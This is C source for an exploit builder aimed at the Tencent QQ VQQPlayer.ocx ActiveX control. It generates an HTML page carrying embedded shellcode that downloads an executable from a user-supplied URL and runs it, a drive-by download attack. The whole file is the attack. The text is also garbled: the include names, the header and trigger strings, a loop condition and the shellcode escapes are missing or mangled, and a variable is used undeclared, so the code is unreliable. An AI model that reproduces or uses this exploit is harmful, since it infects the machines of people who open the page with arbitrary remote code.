#include

  #include

  #include

  FILE *fp = NULL;

  char *file = "fuck_exp1.html";

  char *url = NULL;

  unsigned char sc[] =

  "x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70"

  "x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8"

  "xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00"

  "x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00"

  "x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45"

  "x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40"

  "x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75"

  "x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00"

  "x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5"

  "x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a"

  "x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c"

  "x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c"

  "x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45"

  "x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59"

  "x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08"

  "x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00"

  "x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03"

  "xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7"

  "x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c"

  "x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41"

  "xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d"

  "x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24"

  "x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5"

  "x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e"

  "x00";

  char * header =

  " "

  " "

  " "

  " ";

  char * trigger =

  " "

  " "

  " "

  " "

  " ";

  // print unicode shellcode

  void PrintPayLoad(char *lpBuff, int buffsize)

  {

  int i;

  for(i=0;i{

  if((i%16)==0)

  {

  if(i!=0)

  {

  printf("" "");

  fprintf(fp, "%s", "" + "");

  }

  else

  {

  printf(""");

  fprintf(fp, "%s", """);

  }

  }

  printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

  fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

  }

  //?shellcode???header??,??? " ) " ??

  printf(""; ");

  fprintf(fp, "%s", ""); ");

  fflush(fp);

  }

  void main(int argc, char **argv)

  {

  unsigned char buf[1024] = {0};

  int sc_len = 0;

  if (argc < 2)

  {

  printf("Tencent QQ VQQPlayer.ocx (all version) 0day! ");

  printf("Bug Found by axis@ph4nt0m ");

  printf("Date: 2006-12-27 ");

  printf(" Usage: %s [Local htmlfile] ", argv[0]);

  exit(1);

  }

  url = argv[1];

  if( (!strstr(url, "http://") && !strstr(url, "ftp://"))    strlen(url) < 10)

  {

  printf("[-] Invalid url. Must start with 'http://','ftp://' ");

  return;

  }

  printf("[+] download url:%s ", url);

  if(argc >=3) file = argv[2];

  printf("[+] exploit file:%s ", file);

  fp = fopen(file, "w");

  if(!fp)

  {

  printf("[-] Open file error! ");

  return;

  }

  //build evil html file

  fprintf(fp, "%s", header);

  fflush(fp);

  memset(buf, 0, sizeof(buf));

  sc_len = sizeof(sc)-1;

  memcpy(buf, sc, sc_len);

  memcpy(buf+sc_len, url, strlen(url));

  sc_len += strlen(url)+1;

  PrintPayLoad((char *)buf, sc_len);

  fprintf(fp, "%s", footer);

  fflush(fp);

  fprintf(fp, "%s", trigger);

  fflush(fp);

  printf("[+] exploit write to %s success! ", file);

  }